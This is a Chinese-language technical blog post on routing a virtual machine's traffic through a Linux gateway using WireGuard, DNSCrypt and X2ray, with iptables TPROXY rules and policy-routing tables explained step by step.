<p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">理论上将适合任何架构，任何系统的linux</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">+-----------+                +------------+                +------------+|  虚拟机    |   HostOnly     | GatewWay   |   共享上网      | 宿主机      |      wifi|10.129.37.5|----------------|10.129.3.1  |----------------|10.130.2.1  |----------------INTERNET|           |           eth1 |10.130.2.1  | eth0           |            |+-----------+                +------------+                +------------+<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">虚拟机和Gateway都运行在虚拟机中，虚拟机器将默认网关设置为GateWay。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最终目标是，将HostOnly的所有网络流量，都通过代理的形式，发送到远程服务器。让虚拟机认为自己处在远程网络中。防止出现意外（例如暴露真实ip）</p><blockquote data-tool="mdnice编辑器" style="border-top: none;border-right: none;border-bottom: none;font-size: 0.9em;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">注意，以下如无说明，都在GateWay中操作</p></blockquote><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">处于安全考虑，Linux默认未允许转发目的地不是本机的数据包，需要在/etc/sysctl.conf中写入 net.ipv4.ip_forward = 1以开启转发，完成后需要执行sysctl -p刷新。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">主要有两种配置方法，分别是通过wireguard配置和x2ray。注意，为了保证速度，HostOnly网关应该设置为gateway</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>wireguard</span><span></span></h2><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">wg-quick up wg0 <span style="color: #5c6370;font-style: italic;line-height: 26px;"># 启动wireguard 配置 wg启动一个网卡，并设置系统的默认路由到wg0接口</span><br/>sudo iptables -t nat -A POSTROUTING -o wg0 -j MASQUERADE <span style="color: #5c6370;font-style: italic;line-height: 26px;"># 配置出口网卡为wg0</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过这种方式可以快速将默认网关的流量全部代理到wg中，出口为国外网络</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">然后再安装dnscrypt-proxy</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">记得在/etc/dnscrypt-proxy中操作，dnscrypt-proxy生成system 会把当前目录作为当前配置文件中的工作目录</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">dnscrypt-proxy -service installdnscrypt-proxy -service start<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">把配置文件中，监听0.0.0.0:53 即可</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>配置开机自连接wireguard</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">针对iptables项目开机自恢复，参考x2ray下面的那个配置就可以</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><p>在 /etc/systemd/system/ 目录下创建一个名为 wg.service 的文件，然后添加以下内容并保存。</p></li></ol><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">[Unit]Description=Tproxy ruleAfter=network.targetWants=network.target[Service]Type=oneshot<br/><span style="color: #5c6370;font-style: italic;line-height: 26px;">#注意分号前后要有空格</span>ExecStart=/usr/bin/wg-quick up wg0 ; /sbin/iptables-restore /etc/iptables/rules.v4[Install]WantedBy=multi-user.target<br/></code></pre><ol start="2" data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><p>执行下面的命令使 wg.service 可以开机自动运行。</p></li></ol><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">systemctl <span style="color: #e6c07b;line-height: 26px;">enable</span> wg <br/></code></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>x2ray部分</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里把vmess改成你自己的真实服务器，其他不要动，尤其是sockopt部分。sockopt部分同时也添加到你自己的vmess服务器出口配置中</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>wireguard via X2ray</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这样可以解决wireguard特征过于明显，利用x2ray加速的双重特性。同时也实现了双重代理</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;"><span style="display: none;"></span><span>先决知识</span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们先来了解以下wireguard全局代理的原理
在ubuntu系统上为了实现策略路由，配合iptables的mark，引入了ip list。首先会根据ip报文的标签，决定具体转发到哪张路由表。也就是说系统同时有了很多路由表。我们看一下启动wireguard后的系统的路由表和策略表。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在Linux里，总共可以定义232个优先级的规则，一个优先级别只能有一条规则，即理论上总共可以有条规则。其中有3个规则是默认的<img class="rich_pages wxw-img" data-ratio="0.3289817232375979" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="383" src="https://wechat2rss.xlab.app/img-proxy/?k=edcebc52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEIcPmVVSnQRcjt7vkAlgPwr4RTwlDqmiasaGibc2ayialTZB8sw5TUIXItRdsU3L5yvyD38MwtHYbkw%2F640%3Fwx_fmt%3Dpng"/>0：匹配任何条件，查询路由表local(ID 255)，该表local是一个特殊的路由表，包含对于本地和广播地址的优先级控制路由。rule 0非常特殊，不能被删除或者覆盖。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">32766：匹配任何条件，查询路由表main(ID 254)，该表是一个通常的表，包含所有的无策略路由。系统管理员可以删除或者使用另外的规则覆盖这条规则。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">32767：匹配任何条件，查询路由表default(ID 253)，该表是一个空表，它是后续处理保留。对于前面的策略没有匹配到的数据包，系统使用这个策略进行处理，这个规则也可以删除。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>注：</strong>不要混淆路由表和策略：规则指向路由表，多个规则可以引用一个路由表，而且某些路由表可以策略指向它。如果系统管理员删除了指向某个路由表的所有规则，这个表没有用了，但是仍然存在，直到里面的所有路由都被删除，它才会消失。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在默认情况下进行路由时，首先会根据规则0 在本地路由表里寻找路由，如果目的地址是本网络，或是广播地址的话，在这里就可以找到合适的路由；如果路由失败，就会匹配下一个不空的规则，在这里只有32766规则，在这里将会在主路由表里寻找路由;如果失败，就会匹配32767规则，即寻找默认路由表。如果失败，路由将失败。重这里可以看出，策略性路由是往前兼容的。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">Let’s start from the 32764 rule: as it has a lower number, it’s considered first.</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">32764:  from all lookup main suppress_prefixlength 0<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">The rule has no selector, making the kernel consult the main table for every single packet.
If this was the whole rule, every packet would be routed by the main table, never reaching the VPN. This is why the action also contains a suppressor: suppress_prefixlength 0. From the ip-rule(8) man page</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">suppress_prefixlength NUMBER    reject routing decisions that have a prefix length of NUMBER or less.<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">也就是查表并拒绝包。直连网段的路由表，可以被查询到，而且掩码肯定不为0.那么正常转发。但是如果是默认路由的话，那么查询后的掩码肯定0，那么就拒绝转发。suppress的意思是抑制。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">Here “prefix” refers to the address or range of addresses matched in the routing table. So if you have a route for 10.2.3.4, its prefix length is 32 (bits); if you change it to 10.0.0.0/8, the prefix length will be 8.
What is a prefix of length 0 or less? It’s the empty prefix, 0.0.0.0/0, corresponding to the default route. So if the packet was routed by the default route from main, that routing decision is ignored; otherwise, it’s respected.
To summarize, the effect of this rule is to respect all manual routes that the administrator might have added to the main table. However, if the packet didn’t match any of the specific routes, then instead of applying the default route, we’re proceeding to the next rule.</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">“not from all fwmark 0xca6c lookup 51820”的意思是说，满足条件“from all fwmark 0xca6c“（wireguard发出的都带fwmark 0xca6c )请忽略本条规则，继续往下走，即peer的endpoint地址会走main路。否则，请使用51820路由表，通过wg隧道出去。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">对于wg接口发包自带的0xca6c，继续走下一条规则，也就是匹配默认路由表，从eth0接口发送出去。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在我们了解一下X2ray的iptables配置原理</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">根据iptables五链三表的顺序规则，假如一个包从本机发出，那么首先会经过OUTPUT链，在这里的mangle表，为tcp，udp的报文打上标签为1。也就是下面两条命令</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">iptables -t mangle -A X2RAY_MASK -p udp -j MARK --set-mark 1   # 给 UDP 打标记,重路由iptables -t mangle -A X2RAY_MASK -p tcp -j MARK --set-mark 1   # 给 TCP 打标记，重路由<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">给 OUTPUT 链的 TCP 和 UDP 打个标记 1(OUTPUT 应用 X2RAY_MASK 链)。由于 Netfilter 的特性，在 OUTPUT 链打标记会使相应的包重路由到 PREROUTING 链上，在已经配置好了 PREROUTING 相关的透明代理的情况下，OUTPUT 链也可以透明代理了。其实打标签，打什么无所谓，重要的是让数据包重路由</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">所以在PREROUTING链上，会有下面两条规则。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">iptables -t mangle -A X2RAY -p udp -j TPROXY --on-ip 127.0.0.1 --on-port 12345 --tproxy-mark 1 # 给 UDP 打标记 1，转发至 12345 端口iptables -t mangle -A X2RAY -p tcp -j TPROXY --on-ip 127.0.0.1 --on-port 12345 --tproxy-mark 1 # 给 TCP 打标记 1，转发至 12345 端口<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">只要从PREROUTING进来的包，就给打个1，然后修改数据包的目的ip到12345，也就是我们x2ray代理的地址。打完标签后，并修改目的端口，并不会路由。但是这时候会开始匹配策略路由，所以这时候我们要加一条关于标签1的策略路由，带有标签1的数据包转发到本地。这样，被修改目的端口的数据都会让本机处理，也就是尝试连接本地的12345端口。这时候监听12345即可（也就是x2ray的任意门）
相关文档：https://www.kernel.org/doc/Documentation/networking/tproxy.txthttps://ipset.netfilter.org/iptables-extensions.man.html</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">ip rule add fwmark 0xca6c table 101ip route add local 0.0.0.0/0 dev lo table 101<br/></code></pre><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>如何配置</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在连接wg0的基础上，既然wg0接口自己已经加标签了（0xca6c），那么我们在OUTPUT处，将已经加0xca6c的报文，目的重新修改标签为1，触发报文的重路由，也就是重新到PREROUTING处。当然 x2ray的出口标签是FF，我们要放行。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">iptables -t mangle -I OUTPUT 1 -p udp -j MARK --set-mark 1 -m mark --mark 0xca6c iptables -t mangle -A OUTPUT -j RETURN -m mark --mark 0xff<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">然后添加一条策略路由，针对标签1的报文，交给本地处理，</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">ip rule add fwmark 1 table 101ip route add local 0.0.0.0/0 dev lo table 101<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在wireguard的报文 都会走x2ray了。但是x2ray的报文却不会出去了，因为他的标签是0xff，根据上面我们解释的规则，又会继续转发到wg0口。相当于路由环路。所以我们一定要在wg默认策略前面，新增0xff报文转发到main</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">ip rule add fwmark 0xff table main<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在针对PREROUTING进入的报文，有两种情况，第一别的机器发来的报文，对于这种我们不要做任何处理，因为给wireguard，让他做路由交换。第二就是刚才重路由的，我们转发到本机的12345，利用上面的策略路由</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">iptables -t mangle -I PREROUTING 1  -j TPROXY -p tcp --on-port 12345 --tproxy-mark 1 -m mark --mark 1iptables -t mangle -I PREROUTING 1  -j TPROXY -p udp --on-port 12345 --tproxy-mark 1 -m mark --mark 1 <br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最终策略路由是这个样子的</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">root@router:/home/lzb<span style="color: #5c6370;font-style: italic;line-height: 26px;"># ip rule list</span><br/>0: from all lookup <span style="color: #e6c07b;line-height: 26px;">local</span>32761: from all fwmark 0xff lookup main32762: from all fwmark 0x1 lookup 10132763: from all lookup main suppress_prefixlength 032764: not from all fwmark 0xca6c lookup 5182032765: from all fwmark 0x1 lookup 10032766: from all lookup main32767: from all lookup default<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">iptables是这样的</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD5RicSomkXs6LiarkQvtpBWDEaicu943adrEEbgsibPUgs5KF5vTWd0zZpbe9EEqocRJRIW1nTN3KnIX/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">root@router:/home/lzb<span style="color: #5c6370;font-style: italic;line-height: 26px;"># iptables -t mangle -L -v -n</span>Chain PREROUTING (policy ACCEPT 55789 packets, 60M bytes)<br/> pkts bytes target     prot opt <span style="color: #c678dd;line-height: 26px;">in</span>     out     <span style="color: #e6c07b;line-height: 26px;">source</span>               destination 4521 1297K TPROXY     udp  --  *      *       0.0.0.0/0            0.0.0.0/0            mark match 0x1 TPROXY redirect 0.0.0.0:12345 mark 0x1/0xffffffff    0     0 TPROXY     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            mark match 0x1 TPROXY redirect 0.0.0.0:12345 mark 0x1/0xffffffff<br/>38039   41M CONNMARK   udp  --  *      *       0.0.0.0/0            0.0.0.0/0            /* wg-quick(8) rule <span style="color: #c678dd;line-height: 26px;">for</span> wg0 */ CONNMARK restoreChain INPUT (policy ACCEPT 39693 packets, 42M bytes)<br/> pkts bytes target     prot opt <span style="color: #c678dd;line-height: 26px;">in</span>     out     <span style="color: #e6c07b;line-height: 26px;">source</span>               destinationChain FORWARD (policy ACCEPT 20286 packets, 20M bytes)<br/> pkts bytes target     prot opt <span style="color: #c678dd;line-height: 26px;">in</span>     out     <span style="color: #e6c07b;line-height: 26px;">source</span>               destinationChain OUTPUT (policy ACCEPT 27519 packets, 22M bytes)<br/> pkts bytes target     prot opt <span style="color: #c678dd;line-height: 26px;">in</span>     out     <span style="color: #e6c07b;line-height: 26px;">source</span>               destination<br/> 4521 1297K MARK       udp  --  *      *       0.0.0.0/0            0.0.0.0/0            mark match 0xca6c MARK <span style="color: #e6c07b;line-height: 26px;">set</span> 0x1 6628 1567K RETURN     all  --  *      *       0.0.0.0/0            0.0.0.0/0            mark match 0xffChain POSTROUTING (policy ACCEPT 47805 packets, 42M bytes)<br/> pkts bytes target     prot opt <span style="color: #c678dd;line-height: 26px;">in</span>     out     <span style="color: #e6c07b;line-height: 26px;">source</span>               destination<br/> 2011  574K CONNMARK   udp  --  *      *       0.0.0.0/0            0.0.0.0/0            mark match 0xca6c /* wg-quick(8) rule <span style="color: #c678dd;line-height: 26px;">for</span> wg0 */ CONNMARK save<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">ip 策略路由在INPUT OUTPUT中间，和FORWARD在一起</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">参考https://sleeplessbeastie.eu/2018/06/21/how-to-create-iptables-firewall-using-custom-chains/</p><p><br/></p>




]]></content:encoded>
